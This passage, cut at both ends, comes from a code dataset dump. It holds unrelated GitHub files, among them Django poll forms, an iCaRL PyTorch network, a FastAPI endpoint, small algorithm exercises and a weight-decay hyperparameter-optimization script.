sys\n\n\ndef prismInit(prismArgs=[]):\n if \"PRISM_ROOT\" in os.environ:\n prismRoot = os.environ[\"PRISM_ROOT\"]\n if not prismRoot:\n return\n else:\n prismRoot = PRISMROOT\n\n\n sys.path.insert(0,\"C:/ProgramData/Prism2/plugins/Cinema/Integration/python3.7libs/PySide\")\n from PySide2 import QtWidgets\n qapp = QtWidgets.QApplication.instance()\n \n \n if not qapp:\n QtWidgets.QApplication(sys.argv)\n\n scriptDir = os.path.join(prismRoot, \"Scripts\")\n\n if scriptDir not in sys.path:\n sys.path.append(scriptDir)\n\n import PrismCore\n\n global pcore\n pcore = PrismCore.PrismCore(app=\"Cinema\", prismArgs=prismArgs)\n return pcore\n\n\n\n \n\n","repo_name":"kapellan2000/Cinema","sub_path":"Integration/python3.7libs/PrismInit.py","file_name":"PrismInit.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"18"} +{"seq_id":"71206365479","text":"# A straightforward simulation problem: just do what the statement says.\ndirection = {\n 'U' : (-1,0,'^'),\n 'D' : (1,0,'v'),\n 'L' : (0,-1,'<'),\n 'R' : (0,1,'>'),\n '^' : 'U',\n 'v' : 'D',\n '<' : 'L',\n '>' : 'R'\n}\ndef solution(H, W):\n x, y = finder(H,W)\n for a in act:\n if a == 'S':\n shooting(x,y,direction[direction[maps[x][y]]])\n else:\n maps[x][y] = direction[a][2]\n nx, ny = x+direction[a][0], y+direction[a][1]\n if 0<=nx<H and 0<=ny<W and maps[nx][ny] == '.':\n maps[x][y], maps[nx][ny] = maps[nx][ny], maps[x][y]\n x, y = nx, ny\n\ndef finder(H,W):\n for i in range(H):\n for j in range(W):\n if maps[i][j] in ('<', '>', '^', 'v'):\n # that is where the tank was initially placed\n return 
(i,j)\n\ndef shooting(x,y,d):\n while True:\n x += d[0]\n y += d[1]\n if 0>x or x>=H or 0>y or y>=W:\n return\n elif maps[x][y] == '#':\n return \n elif maps[x][y] == '*':\n maps[x][y] = '.'\n return\n\n\ndef pprint(tc, H,W):\n print('#{}'.format(tc), end=' ')\n for i in range(H):\n print(*maps[i])\n\nfor tc in range(1, int(input())+1):\n H, W = map(int, input().split())\n maps = [list(input()) for _ in range(H)]\n N = int(input())\n act = list(input())\n solution(H, W)\n pprint(tc, H,W)","repo_name":"kyeah01/Problem_Solving","sub_path":"code/SWEA/1873_상호의배틀필드.py","file_name":"1873_상호의배틀필드.py","file_ext":"py","file_size_in_byte":1405,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"32534649194","text":"from uniklinik.forms import BootstrapModelFormMixin\nfrom poll.models import Poll, Option\nfrom django import forms\nfrom django.db.transaction import atomic\nfrom uniklinik.utils import send_push_notifications\nfrom django.contrib.auth.models import User\nfrom account.models import Profile\nfrom django.db.models import F\n\n\nclass PollForm(BootstrapModelFormMixin):\n class Meta:\n model = Poll\n fields = (\"title\", \"description\",)\n\n\nclass PollUpdateForm(BootstrapModelFormMixin):\n option = forms.CharField(required=False, label=\"Neue Option\")\n\n class Meta:\n model = Poll\n fields = (\"title\", \"description\", \"open\", \"option\")\n\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n self.fields[\"title\"].required = True\n self.fields[\"title\"].widget.attrs[\"required\"] = \"required\"\n\n @atomic\n def save(self, commit=True):\n option_title = self.cleaned_data.get(\"option\")\n if option_title:\n new_option = Option(title=option_title)\n new_option.save()\n self.instance.option_set.add(new_option)\n\n option_open = self.cleaned_data.get(\"open\")\n\n if option_open is True:\n poll_title = self.cleaned_data.get(\"title\")\n\n def update_badge_method(push_user_ids):\n Profile.objects.filter(user_id__in=push_user_ids).update(poll_badges=F(\"poll_badges\") + 1)\n\n send_push_notifications(\n User.objects.all(), \"Es gibt eine neue Umfrage\", f\"{poll_title}\", \"poll\", update_badge_method)\n return super().save(commit)\n\n def clean_open(self):\n open_value = self.cleaned_data.get(\"open\")\n if open_value is True:\n if self.instance.option_set.count() == 0:\n option = self.data.get(\"option\")\n print(f\"bananana: {option}\")\n if not option:\n self.add_error(\n \"open\", \"Sie müssen der Umfrage erst eine Option zuweisen, um diese veröffentlichen zu können.\")\n return open_value\n\n\nclass OptionForm(BootstrapModelFormMixin):\n class Meta:\n model = Option\n fields = (\"title\",)\n","repo_name":"memobijou/clinic-app","sub_path":"poll/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26149737920","text":"from typing import Union, Sequence, Callable\n\nimport torch\nfrom torch.nn import Module, Sequential, BatchNorm2d, Conv2d, ReLU, ConstantPad3d, Identity, AdaptiveAvgPool2d, Linear\nfrom torch import Tensor\nfrom torch.nn.init import zeros_, kaiming_normal_\nfrom torch.nn.modules.flatten import Flatten\nimport torch.nn.functional as F\n\n\nclass IdentityShortcut(Module):\n def __init__(self, transform_function: Callable[[Tensor], Tensor]):\n super(IdentityShortcut, self).__init__()\n self.transform_function = transform_function\n\n def forward(self, x: Tensor) -> Tensor:\n 
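# wraps a plain tensor-to-tensor callable as a Module so it can be composed\n # inside nn.Sequential; forward simply applies the stored transform to x\n 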
return self.transform_function(x)\n\n\ndef conv3x3(in_planes: int, out_planes: int, stride: Union[int, Sequence[int]] = 1):\n return Conv2d(in_planes, out_planes, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\ndef batch_norm(num_channels: int) -> BatchNorm2d:\n # Default gamma and beta values are 1 and 0 in both lasagne and pytorch\n # Same for epsilon, which is 1e-4 in both frameworks\n # Same for \"alpha\"|\"momentum\" (lasagne|pytorch)\n # Both frameworks update running averages during training\n\n return BatchNorm2d(num_channels)\n\n\nclass ResidualBlock(Module):\n\n def __init__(self, input_num_filters: int, increase_dim: bool = False, projection: bool = False,\n last: bool = False):\n super().__init__()\n self.last: bool = last # remember whether this is the last block of the network\n\n if increase_dim: # when the dimension increases, stride the first conv and double the output filters\n first_stride = (2, 2)\n out_num_filters = input_num_filters * 2\n else: # otherwise keep stride (1, 1) and the same number of output filters as inputs\n first_stride = (1, 1)\n out_num_filters = input_num_filters\n\n self.direct = Sequential(\n conv3x3(input_num_filters, out_num_filters, stride=first_stride),\n batch_norm(out_num_filters),\n ReLU(True),\n conv3x3(out_num_filters, out_num_filters, stride=(1, 1)),\n batch_norm(out_num_filters),\n ) # Sequential module for the direct (residual) path of the block:\n # two 3x3 convolutions, each followed by batch normalization.\n # The first conv maps the input filters to the output filters and is\n # followed by a ReLU; the second conv keeps the number of filters.\n\n self.shortcut: Module\n # module for the shortcut connection, which carries the input forward;\n # either an identity shortcut or a projection shortcut is chosen below.\n\n # add shortcut connections\n if increase_dim: # when the dimension increases, the shortcut must downsample as well\n # a 1x1 strided convolution plus batch normalization maps the\n # input filters to the output filters\n if projection:\n # projection shortcut, as option B in paper\n self.shortcut = Sequential(\n Conv2d(input_num_filters, out_num_filters, kernel_size=(1, 1), stride=(2, 2), bias=False),\n batch_norm(out_num_filters)\n )\n else: # parameter-free shortcut: subsample spatially and zero-pad the extra channels\n # identity shortcut, as option A in paper\n self.shortcut = Sequential(\n IdentityShortcut(lambda x: x[:, :, ::2, ::2]),\n ConstantPad3d((0, 0, 0, 0, out_num_filters // 4, out_num_filters // 4), 0.0)\n )\n else:\n self.shortcut = Identity()\n\n def forward(self, x):\n # Pass the input through the block. For the last block, return the sum of\n # the direct path and the shortcut as-is; otherwise apply ReLU to the sum.\n if self.last:\n return self.direct(x) + self.shortcut(x)\n else:\n return torch.relu(self.direct(x) + self.shortcut(x))\n\n\nclass IcarlNet(Module): # network architecture for the iCaRL algorithm: residual blocks form the feature extractor, followed by a linear classifier\n def __init__(self, num_classes: int, n=5):\n super().__init__()\n\n input_dims = 3 # number of input image channels\n output_dims = 16 # the first convolutional layer outputs 16 channels\n\n first_conv = Sequential(\n conv3x3(input_dims, output_dims, stride=(1, 1)),\n batch_norm(16),\n ReLU(True)\n )\n\n input_dims = output_dims\n output_dims = 16\n\n # first stack of residual blocks, output is 16 x 32 x 32\n layers_list = []\n for _ in range(n):\n layers_list.append(ResidualBlock(input_dims))\n first_block = Sequential(*layers_list)\n\n input_dims = output_dims\n output_dims = 32\n\n # second stack of residual blocks, output is 32 x 16 x 16\n layers_list = [ResidualBlock(input_dims, increase_dim=True)]\n for _ in range(1, n):\n layers_list.append(ResidualBlock(output_dims))\n second_block = Sequential(*layers_list)\n\n input_dims = output_dims\n output_dims = 64\n\n # third stack of residual blocks, output is 64 x 8 x 8\n layers_list = [ResidualBlock(input_dims, increase_dim=True)]\n for _ in range(1, n-1):\n layers_list.append(ResidualBlock(output_dims))\n layers_list.append(ResidualBlock(output_dims, last=True))\n third_block = Sequential(*layers_list)\n final_pool = AdaptiveAvgPool2d(output_size=(1, 1))\n\n self.feature_extractor = Sequential(\n first_conv, first_block, second_block, third_block, final_pool, Flatten())\n # feature extractor\n input_dims = output_dims\n output_dims = num_classes\n\n self.fc = Linear(input_dims, output_dims)\n # linear classification layer named fc: input size is input_dims, output size is output_dims\n\n def forward(self, x):\n # forward pass of the model: take the input x and compute the output\n x = self.feature_extractor(x) # Already flattened\n # the feature extractor pools the spatial size down to 1x1, so Flatten\n # turns the feature map into a plain feature vector\n x = self.fc(x)\n # fc maps the feature vector to per-class scores; a sigmoid is applied\n # as the final activation\n return torch.sigmoid(x)\n\n\ndef make_icarl_net(num_classes: int, n=5) -> IcarlNet:\n return IcarlNet(num_classes, n=n)\n\n\ndef initialize_icarl_net(m: Module):\n if isinstance(m, Conv2d):\n kaiming_normal_(m.weight.data, mode='fan_in', nonlinearity='relu')\n if m.bias is not None:\n zeros_(m.bias.data)\n\n elif isinstance(m, Linear):\n # Note: nonlinearity='sigmoid' -> gain = 1.0 as of PyTorch code. 
See torch.nn.init.calculate_gain(...)\n kaiming_normal_(m.weight.data, mode='fan_in', nonlinearity='sigmoid')\n if m.bias is not None:\n zeros_(m.bias.data)\n\n\n\n","repo_name":"ahhnchangjun/Continual_Learning","sub_path":"iCaRL_PyTorch/models/icarl_net.py","file_name":"icarl_net.py","file_ext":"py","file_size_in_byte":7600,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19830126129","text":"import pandas as pd \nfrom nltk.corpus import stopwords \nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport joblib\nimport xgboost \n\n#Perform text preprocessing on the sentiments of the 20 products recommended by our recommendation system\ndef clean_reviews(df): \n\n df['reviews_text'] = df['reviews_text'].replace(r'','', regex = True)\n df['reviews_text'] = df['reviews_text'].replace(r'\\B|\\B|','', regex = True)\n # convert sentiments to lowercase\n df['reviews_text'] = df['reviews_text'].str.lower() \n #remove user mentions\n df['reviews_text'] = df['reviews_text'].replace(r'^(@\\w+)',\"\", regex=True) \n #remove_symbols\n df['reviews_text'] = df['reviews_text'].replace(r'[^a-zA-Z0-9]', \" \", regex=True)\n #remove punctuations \n df['reviews_text'] = df['reviews_text'].replace(r'[[]!\"#$%\\'()\\*+,-./:;<=>?^_`{|}]+',\"\", regex = True) \n #remove words of length 1 or 2 \n df['reviews_text'] = df['reviews_text'].replace(r'\\b[a-zA-Z]{1,2}\\b','', regex=True)\n #remove extra spaces in the tweet\n df['reviews_text'] = df['reviews_text'].replace(r'^\\s+|\\s+$',\" \", regex=True)\n \n # Removing the stopwords (use the set directly so per-word membership tests work)\n stop_words = set(stopwords.words('english'))\n mystopwords = stop_words\n df['reviews_text'] = df['reviews_text'].apply(lambda x: ' '.join([word for word in x.split() if word not in mystopwords]))\n\n # change the datatype of sentiments by replacing positive by 1 and negative by 0\n df = df.replace({\"Positive\":1, \"Negative\":0})\n \n #Tokenize and vectorize reviews of the recommended items\n word_vectorizer = TfidfVectorizer(\n sublinear_tf=True,\n strip_accents='unicode',\n analyzer='word',\n token_pattern=r'\\w{1,}',\n stop_words='english',\n ngram_range=(1, 3), \n max_features=50000\n )\n all_text = df['reviews_text']\n word_vectorizer.fit(all_text)\n train_word_features = word_vectorizer.transform(all_text)\n\n #Load the sentiment analysis model and make predictions for these reviews\n model = joblib.load(\"joblib_model_xgb.pkl\")\n preds = model.predict(train_word_features)\n df['preds'] = preds\n \n return df","repo_name":"Prajwal-Langde/capstone_heroku","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41602004282","text":"# Python program to find the area of a circle\nimport math as m\n\ndef area(r):\n a = m.pi * (m.pow(r, 2))\n print(\"area of circle is {:.4f} sq.units\".format(a))\n\n\n\nradius = int(input(\"enter the radius:\"))\n\narea(radius)","repo_name":"Madhu-Kumar-S/Python_Basics","sub_path":"Basic Programs/circle area.py","file_name":"circle area.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"26906289494","text":"import config\n\nfrom fastapi import APIRouter, Request, Response\n\nfrom core_common import core_process_request, core_prepare_response, E\n\nrouter = APIRouter(prefix=\"/core\", 
tags=[\"message\"])\n\n\n@router.post(\"/{gameinfo}/message/get\")\nasync def message_get(request: Request):\n request_info = await core_process_request(request)\n\n response = E.response(\n E.message(\n expire=300,\n *[\n E.item(\n name=s,\n start=0,\n end=604800,\n )\n for s in (\"sys.mainte\", \"sys.eacoin.mainte\")\n if config.maintenance_mode\n ]\n )\n )\n\n response_body, response_headers = await core_prepare_response(request, response)\n return Response(content=response_body, headers=response_headers)\n","repo_name":"drmext/MonkeyBusiness","sub_path":"modules/core/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"18"} +{"seq_id":"42878985018","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : JaeZheng\n# @Time : 2019/9/4 14:10\n# @File : Coordinator.py\n\nimport tensorflow as tf\nimport numpy as np\nimport threading\nimport time\n\n\n# Function run inside each thread: every second, check whether it should stop, and print its own ID\ndef MyLoop(coord, worker_id):\n while not coord.should_stop():\n if np.random.rand() < 0.1: # randomly stop all threads\n print(\"Stopping from id: {:d}\\n\".format(worker_id))\n # notify the other threads to stop\n coord.request_stop()\n else:\n print(\"Working on id: {:d}\\n\".format(worker_id))\n time.sleep(1)\n\n\n# declare a coordinator\ncoord = tf.train.Coordinator()\n# create 5 threads\nthreads = [threading.Thread(target=MyLoop, args=(coord, i)) for i in range(5)]\n# start all threads\nfor t in threads:\n t.start()\n# wait for all threads to exit\ncoord.join(threads)","repo_name":"JaeZheng/learn_tf","sub_path":"chapter7/Coordinator.py","file_name":"Coordinator.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"23474449532","text":"from sys import argv\ndef digs(n):\n array = []\n while n > 0:\n d = n // 10\n k = n - d * 10\n n = d\n array.append(k)\n array.reverse()\n return array\n\ndef calc(x, y):\n temp = 0\n total = 0\n for i in range(2, x):\n k = digs(i)\n temp = i\n sum = 0\n for j in k:\n sum += pow(j, y)\n if sum == temp:\n total += sum\n return total\n\nnumber = int(argv[1])\npowers = int(argv[2])\nprint(calc(number, powers))\n","repo_name":"Sonni/Who-s-Julia-","sub_path":"Benchmarking/stats/euler30/euler30.py","file_name":"euler30.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7990855089","text":"X = float(input())\n\nN = []\n\nfor index, value in enumerate(range(0, 100)):\n nextNumber = 0\n if index == 0:\n N.append(X)\n else:\n nextNumber = N[-1]/2\n N.append(nextNumber)\n\n print('N[%i] = %.4f'%(index, N[index])) ","repo_name":"gustavonikov/URI_problems","sub_path":"URI 1178 - Array Fill III.py","file_name":"URI 1178 - Array Fill III.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10661462879","text":"#!/usr/bin/env python\n# python 3.7, pytorch 1.2, cuda 10.0\nimport numpy as np\nimport os\nimport argparse\nimport pickle\nimport random\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom typing import List, Tuple\n\n\ndef main():\n p = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n p.add_argument('--dataset', default='MNIST', choices={\"MNIST\", \"CIFAR-10\"}, help=\"which dataset to fit\")\n p.add_argument('--network', 
default='linear', choices={\"linear\", \"resnet-18\", \"resnet-34\"}, help=\"which network architecture to use\")\n p.add_argument('--inner_steps', default=1000, type=int)\n p.add_argument('--outer_steps', default=100, type=int)\n p.add_argument('--online', default=False, action='store_true')\n p.add_argument('--zeta_min', default=0, type=float, help=\"minimum value of zeta to test\")\n p.add_argument('--zeta_max', default=5, type=float, help=\"maximum value of zeta to test\")\n p.add_argument('--num_zeta', default=1, type=int, help=\"number of values of zeta to test, linearly spaced between zeta_min and zeta_max\")\n p.add_argument('--replicates', default=1, type=int, help=\"run each experiment this many times\")\n args = p.parse_args()\n results_dict = {}\n for zeta in np.linspace(args.zeta_min, args.zeta_max, args.num_zeta):\n for fit_num in range(args.replicates):\n train_stats, valid_stats, test_stats, regularizers, w_norms = run_fit(\n zeta,\n args.inner_steps,\n args.outer_steps,\n args.online,\n args.network,\n args.dataset,\n fit_num=fit_num)\n result = {\n 'train_stats': train_stats,\n 'valid_stats': valid_stats,\n 'test_stats': test_stats,\n 'regularizers': regularizers,\n 'weight_norms': w_norms\n }\n results_dict[(zeta, fit_num)] = result\n\n with open(f'results.pkl', 'wb') as fp:\n pickle.dump(results_dict, fp)\n\n\nclass LinearNet(nn.Module):\n def __init__(self, input_dim, num_classes):\n super(LinearNet, self).__init__()\n # an affine operation: y = Wx + b\n self.fc1 = nn.Linear(input_dim, num_classes) # 28*28 from image dimension, 10 classes\n\n def forward(self, x):\n x = self.fc1(x)\n return x\n\n\ndef get_accuracy(model, images, labels):\n \"\"\"Compute the classification accuracy\"\"\"\n outputs = model(images)\n _, predicted = torch.max(outputs, 1)\n total = labels.size(0)\n correct = (predicted == labels).sum().item()\n return correct / total\n\n\ndef get_test_stats(model, testloader, network, dataset):\n \"\"\"Compute classification accuracy for the entire test set\n\n Args:\n model (torch.nn) the model\n testloader (iterator) iterator over the test data\n network (str) name of the network, either linear, resnet-18, or resnet-34\n dataset (str) either MNIST or CIFAR-10\n\n Returns:\n test_loss (float) cross-entropy loss\n test_accuracy (float) fraction of test images classified correctly\n \"\"\"\n dataloader = iter(testloader)\n total = 0\n correct = 0\n loss = 0\n criterion = torch.nn.CrossEntropyLoss()\n for test_images, test_labels in dataloader:\n if network == 'linear':\n test_images = reshape_for_linear(test_images).cuda()\n elif dataset == 'MNIST':\n test_images = test_images.view(-1, 1, 28, 28).cuda()\n else:\n test_images = test_images.cuda()\n\n test_labels = test_labels.cuda()\n outputs = model(test_images)\n _, predicted = torch.max(outputs, 1)\n loss += criterion(outputs, test_labels)\n total += test_labels.size(0)\n correct += (predicted == test_labels).sum().item()\n return loss, correct / total\n\n\ndef reshape_for_linear(images):\n \"\"\"Reshape the images for the linear model\n Our linear model requires that the images be reshaped as a 1D tensor\n \"\"\"\n n_images, n_rgb, img_height, img_width = images.shape\n return images.reshape(n_images, n_rgb * img_height * img_width)\n\n\ndef fetch_CIFAR_data(network='linear'):\n import torchvision\n import torchvision.transforms as transforms\n\n transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n trainset = 
torchvision.datasets.CIFAR10(\n root='./data', train=True, download=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=50, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.CIFAR10(\n root='./data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=4, shuffle=False, num_workers=2)\n\n dataiter = iter(trainloader)\n train_images, train_labels = next(dataiter)\n valid_images, valid_labels = next(dataiter)\n\n if network == 'linear':\n train_images = reshape_for_linear(train_images)\n valid_images = reshape_for_linear(valid_images)\n\n train_images = train_images.cuda()\n valid_images = valid_images.cuda()\n train_labels = train_labels.cuda()\n valid_labels = valid_labels.cuda()\n return (train_images, train_labels), (valid_images, valid_labels), testloader\n\n\ndef fetch_MNIST_data(network='linear'):\n import torchvision\n import torchvision.transforms as transforms\n\n transform = transforms.Compose([transforms.ToTensor()])\n\n trainset = torchvision.datasets.MNIST(\n root='./data', train=True, download=True, transform=transform)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=50, shuffle=True, num_workers=2)\n\n testset = torchvision.datasets.MNIST(\n root='./data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=50, shuffle=False, num_workers=2)\n dataiter = iter(trainloader)\n train_images, train_labels = next(dataiter)\n valid_images, valid_labels = next(dataiter)\n\n if network == 'linear':\n train_images = reshape_for_linear(train_images).cuda()\n valid_images = reshape_for_linear(valid_images).cuda()\n else:\n train_images = train_images.view(-1, 1, 28, 28).cuda()\n valid_images = valid_images.view(-1, 1, 28, 28).cuda()\n\n train_labels = train_labels.cuda()\n valid_labels = valid_labels.cuda()\n return (train_images, train_labels), (valid_images, valid_labels), testloader\n\n\ndef compute_auxiliary(model, criterion: torch.nn.modules.loss.CrossEntropyLoss,\n train_data: Tuple[torch.Tensor, torch.Tensor],\n valid_data: Tuple[torch.Tensor, torch.Tensor],\n weight_decays: List[torch.Tensor], zeta: float,\n lr: float) -> torch.Tensor:\n \"\"\"Compute the auxiliary variables described in Algorithm 3.1 in the main paper\n\n Note: this increments the gradient of each of the weight_decays tensors corresponding\n to the variable denoted as X in Algorithm 3.1\n\n Returns:\n norm (scalar-valued torch.tensor) this is the squared 2-norm of the difference\n between the training and validation gradients (Y in Algorithm 3.1).\n \"\"\"\n train_images, train_labels = train_data\n valid_images, valid_labels = valid_data\n\n # compute training gradient\n model.zero_grad()\n outputs = model(train_images)\n loss = criterion(outputs, train_labels)\n loss.backward()\n\n train_grads = [p.grad.detach().clone() for p in model.parameters()]\n\n # compute validation gradient\n model.zero_grad()\n outputs = model(valid_images)\n loss = criterion(outputs, valid_labels)\n loss.backward()\n valid_grads = [p.grad for p in model.parameters()]\n \"\"\"\n This code computes auxiliary variables for an update to the hyperparameter gradient.\n Tried to write the update rule here but it doesn't really work well in non-LaTeX.\n \"\"\"\n align = []\n norm = 0\n for p, wd, t_grad, v_grad in zip(model.parameters(), weight_decays, train_grads, valid_grads):\n a = t_grad + wd * p.data - v_grad\n norm += (a**2).sum()\n 
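# 'a' is the per-tensor mismatch between the weight-decayed training gradient\n # and the validation gradient; its squared 2-norm accumulates into 'norm'\n # (the quantity Y in Algorithm 3.1)\n 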
align.append(a)\n\n for a, p, wd in zip(align, model.parameters(), weight_decays):\n if wd.grad is None:\n wd.grad = torch.zeros_like(wd)\n if norm == 0:\n wd.grad += 0\n else:\n wd.grad += zeta * p * a\n return norm\n\n\ndef optimizer_step(optimizer: torch.optim.Optimizer, model,\n criterion: torch.nn.modules.loss.CrossEntropyLoss,\n data: Tuple[torch.Tensor, torch.Tensor]):\n \"\"\"Helper function to run a single step of the inner optimization\"\"\"\n images, labels = data\n optimizer.zero_grad()\n outputs = model(images)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n return loss\n\n\ndef compute_and_log_statistics(model, train_data: Tuple[torch.Tensor, torch.Tensor],\n valid_data: Tuple[torch.Tensor, torch.Tensor], testloader,\n hyper_step: int, network: str, dataset: str):\n train_images, train_labels = train_data\n valid_images, valid_labels = valid_data\n with torch.no_grad():\n train_acc = get_accuracy(model, train_images, train_labels)\n valid_acc = get_accuracy(model, valid_images, valid_labels)\n\n test_loss, test_acc = get_test_stats(model, testloader, network, dataset)\n test_loss = test_loss.detach().cpu().numpy()\n return train_acc, valid_acc, test_loss, test_acc\n\n\ndef load_model(network, dataset):\n from torchvision import models\n if network == 'linear':\n if dataset == 'MNIST':\n model = LinearNet(28 * 28, 10)\n elif dataset == 'CIFAR-10':\n model = LinearNet(3 * 32 * 32, 10)\n\n elif network == 'resnet-18':\n model = models.resnet18()\n if dataset == 'MNIST':\n model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)\n elif network == 'resnet-34':\n model = models.resnet34()\n if dataset == 'MNIST':\n model.conv1 = nn.Conv2d(1, 64, kernel_size=7, stride=2, padding=3, bias=False)\n else:\n raise ValueError(\"Invalid choice of network\")\n return model\n\n\ndef seed_everything(seed=0):\n random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n np.random.seed(seed)\n os.environ['PYTHONHASHSEED'] = str(seed)\n\n\ndef run_fit(zeta: float,\n inner_steps: int,\n outer_steps: int,\n online: bool = False,\n network: str = 'linear',\n dataset: str = 'MNIST',\n fit_num: int = 0) -> Tuple[List, List, List, List]:\n \"\"\"Run a single weight-decay experiment with a specific choice of the regularizer\n using Algorithm C.3 (online optimization of Eq. 
7)\n\n Args:\n zeta (float) the scale-factor that determines the strength of the regularization penalty\n inner_steps (int) number of steps of inner parameter optimization\n outer_steps (int) number of steps of the outer hyperparameter optimization to run\n network (str) either \"linear\" or \"resnet-18\" or \"resnet-34\"\n dataset (str) either \"MNIST\" or \"CIFAR-10\"\n fit_num (int) a random seed for parameter initialization.\n\n Returns:\n train_stats, valid_stats, test_stats (Tuple[List, List]) each of these is a tuple\n containing the cross-entropy losses and classification accuracies over the inner\n optimization on the training, validation and test sets respectively.\n regularizers (List) value of the regularizer over the inner optimization\n weight_norms (List) 2-norm of the model weights over the inner optimization\n \"\"\"\n # make sure we get a fixed random seed when loading the data, so that each fit gets the same\n # 50 image subset of MNIST or CIFAR10\n seed_everything(0)\n if dataset == 'MNIST':\n train_data, valid_data, testloader = fetch_MNIST_data(network)\n elif dataset == 'CIFAR-10':\n train_data, valid_data, testloader = fetch_CIFAR_data(network)\n\n valid_images, valid_labels = valid_data\n\n # Now set the random seed to something different so that each experiment\n # is independent for computing error bars over multiple parameter initializations\n seed_everything(fit_num)\n\n model = load_model(network, dataset)\n model = model.cuda()\n\n criterion = torch.nn.CrossEntropyLoss()\n lr = 1e-4\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\n\n weight_decays = []\n for parameter in model.parameters():\n weight_decays.append(torch.zeros_like(parameter, requires_grad=True))\n\n ho_optimizer = torch.optim.RMSprop(weight_decays, lr=1e-2)\n\n ## penalty size\n zeta = zeta * lr**2\n\n train_losses = []\n train_accs = []\n valid_losses = []\n valid_accs = []\n test_losses = []\n test_accs = []\n regularizers = []\n weight_norms = []\n\n for hyper_step in range(outer_steps):\n ho_optimizer.zero_grad()\n total_norm = 0\n for _ in range(inner_steps):\n\n sq_norm = compute_auxiliary(model, criterion, train_data, valid_data, weight_decays,\n zeta, lr)\n sq_norm = sq_norm.detach()\n if zeta > 0 and online:\n for wd in weight_decays:\n wd.grad /= torch.sqrt(sq_norm)\n ho_optimizer.step()\n ho_optimizer.zero_grad()\n total_norm += sq_norm # Y update in Algorithm 3.1\n\n # take training step with training gradient\n train_loss = optimizer_step(optimizer, model, criterion, train_data)\n\n # add separable weight decay to optimizer step\n for p, wd in zip(model.parameters(), weight_decays):\n p.data -= lr * wd * p.data\n\n # take hyperparameter step\n optimizer.zero_grad()\n outputs = model(valid_images)\n valid_loss = criterion(outputs, valid_labels)\n valid_loss.backward()\n\n for wd in weight_decays:\n if zeta > 0 and not online:\n wd.grad /= 2 * torch.sqrt(total_norm)\n\n # validation risk hyperparameter gradient using identity approximation to the Hessian\n # gradient estimator proposed by Lorraine et al. 
2019\n weight_norm = 0.0\n for wd, p in zip(weight_decays, model.parameters()):\n wd.grad += -lr * p * p.grad\n weight_norm += torch.norm(p)**2\n ho_optimizer.step()\n\n # prep for data dump\n train_loss = train_loss.detach().cpu().numpy()\n valid_loss = valid_loss.detach().cpu().numpy()\n regularizer = torch.sqrt(total_norm).detach().cpu().numpy()\n weight_norm = torch.sqrt(weight_norm).detach().cpu().numpy()\n\n train_acc, valid_acc, test_loss, test_acc = compute_and_log_statistics(\n model, train_data, valid_data, testloader, hyper_step, network, dataset)\n print(f'Hyper step: {hyper_step}')\n print(f'Valid Loss: {valid_loss}')\n print(f'Valid Accuracy: {valid_acc}')\n print(f'Train Accuracy: {train_acc}')\n print(f'Test Accuracy: {test_acc}')\n print(f'Regularizer: {torch.sqrt(total_norm)}')\n print('-------------------------------')\n train_losses.append(train_loss)\n train_accs.append(train_acc)\n valid_losses.append(valid_loss)\n valid_accs.append(valid_acc)\n test_losses.append(test_loss)\n test_accs.append(test_acc)\n regularizers.append(regularizer)\n weight_norms.append(weight_norm)\n\n train_stats = (train_losses, train_accs)\n valid_stats = (valid_losses, valid_accs)\n test_stats = (test_losses, test_accs)\n\n return train_stats, valid_stats, test_stats, regularizers, weight_norms\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"DEShawResearch/PACBayesHyperOpt","sub_path":"weight_decay/weight_decay.py","file_name":"weight_decay.py","file_ext":"py","file_size_in_byte":15828,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"29180633460","text":"import string\nimport random\n\ninput_text = 'ABCD'\ntext_array = []\n\na = 3\nm = 13\nuppercase_letters = string.ascii_uppercase\nhash_dict = {}\nhash_text_dict = {}\ncounter = 1\npowered = 0\nhash_result = 0\ncontinued = True\n\nfor letter in uppercase_letters:\n hash_dict[letter] = counter\n counter += 